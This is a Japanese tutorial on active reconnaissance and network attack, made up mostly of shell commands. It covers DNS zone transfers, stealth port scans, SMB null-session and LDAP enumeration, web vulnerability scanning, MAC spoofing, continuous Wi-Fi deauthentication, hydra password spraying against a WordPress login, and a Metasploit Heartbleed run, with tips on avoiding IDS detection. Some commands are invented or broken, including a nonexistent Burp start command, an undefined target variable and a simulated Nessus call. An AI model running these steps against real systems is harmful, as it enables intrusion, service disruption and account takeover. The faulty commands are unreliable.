能動型偵察（Active Reconnaissance）の基本概念

パブリックな公開情報に頼るだけでなく、標的システムへ直接接続を確立して内部構造を把握するアプローチは、脆弱性発掘において不可欠なステップです。この方法により、稼働中のオペレーティングシステム、有効なネットワークサービス、共有ディレクトリ構成などが明確になります。ただし、直接的なインタラクションが発生するため、IDS/IPS やファイアウォールによる検知リスクが伴います。適切に設計されたスキャンプロファイルを用いることで、痕跡を残さずに必要なデータを取得可能ですが、実行計画には十分な考慮が必要です。

DNS レコード解析とゾーン転送の実施

ドメイン名解決のプロセスを追跡することは、組織の外部面のアセットマップ作成に直結します。ネームサーバーの構成ミスや権限設定の不備が利用されると、内部インフラの全体像が外部から抽出される可能性があります。以下の手順では、自動的な列挙ツールを活用してターゲットドメインのレコードを抽出し、設定上の隙を狙います。

# ターゲットドメインを変数で定義し自動化を促進
TARGET_DOMAIN="example.com"
# ネームサーバー情報を取得
nslookup -type=ns $TARGET_DOMAIN
# ゾーン転送を試行（管理者権限が必要ない場合のみ実行）
host -l $TARGET_DOMAIN ns1.$TARGET_DOMAIN
# 階層的なサブドメイン発見と IP マッピング
fierce -dns $TARGET_DOMAIN
# 詳細な DNS 情報統合解析
dnsenum $TARGET_DOMAIN

ネットワークスキャンと TCP/IP フラグの制御

標的機への到達性を確認し、開いているポートと該当サービスのバージョンを特定するには、TCP コネクションの仕組みを理解した上でスキャンパラメータを調整する必要があります。完全なセッション張替ではなく、一部のフラグ操作を活用することで、ログに残りにくい探索が可能になります。

# パイプライン処理を用いたポート範囲指定スキャン
PORT_RANGE="20-8080"
SCANNER_ARGS="-T4 -sV -O"
nmap $SCANNER_ARGS -p $PORT_RANGE 192.168.50.10
# ハンドシェイクを経由しない非対称スキャン（Stealth Scan）
TARGET_IP="192.168.50.10"
nmap --scan-flags SYN -p 22,80,443 $TARGET_IP
# ICMP フィルタリング回避のための生ホスト探索
nmap -Pn -sn $TARGET_IP

プロトコル層での認証なしアクセス列挙

SMB および LDAP ディレクトリサービスは、誤ったアクセス制御リストや無制限のセッション許可によって機密情報が露出することがあります。特に空セッションや匿名クエリを許可している環境では、ユーザー一覧やグループポリシーの詳細が容易に取得可能です。

# SMB 共有マウント状態と権限チェック
SHARE_TARGET="10.0.0.25"
smbmap -H $SHARE_TARGET -R /data
rpcclient -U "" $SHARE_TARGET
# 空セッション内で srvinfo コマンドを実行して OS 種別を取得
echo "srvinfo" | rpcclient -U "" $SHARE_TARGET -c ""
# LDAP クエリ専用クライアント経由でのディレクトリトラバース
ldapsearch -x -h $SHARE_TARGET -b "dc=pentestlab,dc=local" -D "cn=admin,dc=pentestlab,dc=local" -W '(objectClass=*)'
# Web 対象機のビジュアル記録およびメタデータ収集
eyewitness.py --web --single http://$SHARE_TARGET

自動化された脆弱性情報ベースの評価

既知のミスキコンフィグレーションや公開 CWE データと照合して優先度を決定するには、専用スキャナーを効率的に運用する必要があります。レポートのエクスポート機能を組み合わせることで、修正計画への展開がスムーズになります。

# Nessus 向けのスキャンテンプレート適用例（API コマンド風シミュレーション）
SCAN_PROFILE="advanced_audit"
NESSUS_POLICY_ID=$(curl -k https://localhost:8834/api/v1/templates/$SCAN_PROFILE | jq -r '.id')
# 結果フォーマット指定と出力先定義
export EXPORT_FORMAT="html|csv"
export REPORT_OUTPUT_DIR="/var/reports/assessment"
# Web サーバー特化型チェックサムの走査
nikto -h http://$SHARE_TARGET -o nikto_results.xml -Format xml
# WordPress ベース CMS のプラグイン依存関係とKnown-Vuln 検索
wpscan --url http://$SHARE_TARGET --disable-tls-checks -e vp,u,t
# HTTP リクエスト/レスポンスの改竄ポイント特定用プロキシ起動
burp_suite_start_proxy --port 8080 --target http://$SHARE_TARGET

無線インターフェースのモード切替とアドレス偽装

物理レイヤ以下のトラフィック監視を行う場合、NIC は管理モードから独立した監視モードへ移行する必要があります。また、接続元を不特定化するためにハードウェアアドレスを書き換える手順も標準的に実施されます。

# ワイヤレスデバイス名の固定化
WLAN_DEV="wlan0"
# アクティブなプロセス殺戮とモニタリング有効化
airmon-ng check kill
airmon-ng start $WLAN_DEV
# ハードウェア識別子のランダム生成置換
ifconfig $WLAN_DEV down
macchanger -r $WLAN_DEV
ifconfig $WLAN_DEV up
# インターフェース状態の最終確認
iwconfig ${WLAN_DEV}mon

無線通信の断絶、偽造アクセスポイント構築、および認証突破

暗号化キーの解読前段として、既存の接続を強制解除したり、悪意のあるハブを設置したりする手法が存在します。さらに、多因子認証が未導入の環境では辞書攻撃やスプレッディング攻撃によってアカウント侵害に至るケースも見られます。

# デ-auth ペイロードの継続送信（原因コード 2/3 を明示）
TARGET_BSSID="AA:BB:CC:DD:EE:FF"
CLIENT_MAC="11:22:33:44:55:66"
aireplay-ng --deauth 0 -a $TARGET_BSSID -c $CLIENT_MAC ${WLAN_DEV}mon
# 包括的無線テストスイートの起動と対話型メニュー選択
./airgeddon.sh
# 動的資格情報検証用の並列クレデンシャル試行（パスワードスプレッディング）
HYDRA_CMD="hydra -L userlist.lst -P passlist.lst $TARGET_HOST http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username' -V -w 10"
eval $HYDRA_CMD
# 古旧な TLS バージョンに対するメモリリーク動作の検証
msfconsole -q -x "use auxiliary/scanner/ssl/openssl_heartbleed; set RHOSTS $TARGET_HOST; set RPORT 8443; run"